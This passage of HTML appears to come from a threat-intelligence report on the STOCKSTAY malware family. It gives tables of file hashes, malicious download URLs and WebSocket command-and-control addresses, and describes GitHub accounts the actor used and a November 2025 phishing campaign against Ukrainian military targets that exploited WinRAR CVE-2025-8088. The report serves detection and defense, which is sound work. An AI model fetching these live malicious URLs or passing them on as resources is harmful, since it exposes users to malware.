&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ConverterDDSNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;55249f296b63a8bcf911b8bc96de43c1ac2b4a56c150a19d33d892a47e57352c&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;e3364ee21cae6725451e8bc9ab9933df0000fd19814170bd132da68d1906d5ff&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 15: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://basecon.com.ua/calculator.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing HTA lure and STOCKSTAY.MARKETMAKER downloader&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;https://online.zp.ua/wp-content/uploads/Tools/EditorToolsPdf.zip&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Compromised WordPress infrastructure hosting STOCKSTAY ZIP archive&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 16: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;July 23 – 28, 2025: Actor Uses GitHub to Host STOCKSTAY MSI Files&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a GitHub account we suspect of being used by the threat actor to test or deploy STOCKSTAY. The GitHub account, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Roberto1983-ai&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created on July &lt;span style="vertical-align: baseline;"&gt;23,&lt;/span&gt; 2025 at 12:01:03. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On July &lt;span style="vertical-align: baseline;"&gt;24,&lt;/span&gt; 2025, the account created a public repository named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;msi_installer_test2&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, into which a single file was uploaded: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. A second repository, this time named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;msi_installer_test3&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created by the same user on July 28, 2025, and subsequently populated with another version of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Both versions of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; contained core STOCKSTAY components, alongside a configuration file containing the WebSocket C2 URL &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. GTIG has been unable to identify any active operations using these specific MSI files.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;19e6ed42248f9d03beb343a7c09a864dcd3cd671c29e1e5eac93579225224ac9&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;DiplomacyEduAI.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;6298f3150ad94a242e649886d47c59c634a4d04b9af5ee15e3bf335c40b5e58e&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ClientMNGR.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ViewPdf.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;ConverterDDSNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;d8fe8f3fe838d5b1a1043096f6f6bb6f524f5f1b0c9f83a081078a824daa0cf3&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;fonts&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;4e3bed10a8eff3e9205c1f37f647512464271d5ac65df7ae4709735621a38320&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 17: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://canal1zac1a.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 18: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;August 14, 2025: Actor Uses GitHub to Host STOCKSTAY Server Code&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified a second GitHub account, which was observed hosting what we assess to be server-side code for handling STOCKSTAY C2 communications. The GitHub account, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ChikenFresh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, was created on August 14, 2025, then almost immediately created a public repository named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;google-ai-labs-it&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, into which the suspected C2 controller code was uploaded. Our analysis of the C2 controller is included in the malware analysis section earlier in this report.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The GitHub repository name corresponds with a STOCKSTAY C2 server identified running on the Render platform, however GTIG has not observed any active operations using this infrastructure. We assess that the threat actor linked this GitHub repository to their Render account in order to utilize their &lt;/span&gt;&lt;a href="https://render.com/docs/websocket" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WebSocket hosting&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; capabilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Python STOCKSTAY C2 controller&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;f04f43b6f7c2d86109c495179b497f7fb45fd95816623de1b77900f71b4f99ed&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;models.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Database table definitions and models for use by &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;7615140f78d9a0ce31cc9fe8c54c60028a7439cb32526fd97b10afef7145dd78&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wtools.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Utility functions for use by &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;server.py&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b55f3b8a7334af049ba3f70a9ad3fe78574b1e180c68baf9a7110d104387a636&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 19: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://google-ai-labs-it.onrender.com/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 20: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;November 2025: Ukraine — Drone-Related Lures and Deployment via CVE-2025-8088&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On November 6, 2025, GTIG identified a batch of phishing emails being sent from a drone-themed UKR.NET email account, to approximately 20 Ukraine-based targets, each containing a unique ukr.net file sharing link. Each link led to a malicious RAR archive which exploits a path traversal vulnerability in WinRAR (&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2025-8088&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;) to install the core STOCKSTAY components. Continuations of this phishing activity were observed on November 12 and 14, 2025. We identified that only around 30% of the recipients of these phishing emails opened the emails, however we are unable to confirm how many of these individuals downloaded or executed the malicious payloads. All affected Google accounts were marked for additional authentication checks as a precautionary measure against potential account compromise. Google also notified affected users via our &lt;/span&gt;&lt;a href="https://support.google.com/mail/answer/2591015" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Government Backed Attack Warning&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (GBAW) notifications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified two distinct types of Ukrainian-language decoy documents within the malicious RAR archives, both appearing to target Ukrainian military personnel. The first, “Донесення БпЛА 06.11.2025.docx” (“UAV report 06.11.2025.docx”), claimed to be “[A] Report on the availability/need for UAVs, their condition, the availability of crews for each UAV in the units, their training in the defense zone of the 1st Brigade as of 06.11.2025” (see Figure 10).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="“Report” Decoy document from November 2025" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig10.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 10: “Report” Decoy document from November 2025&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
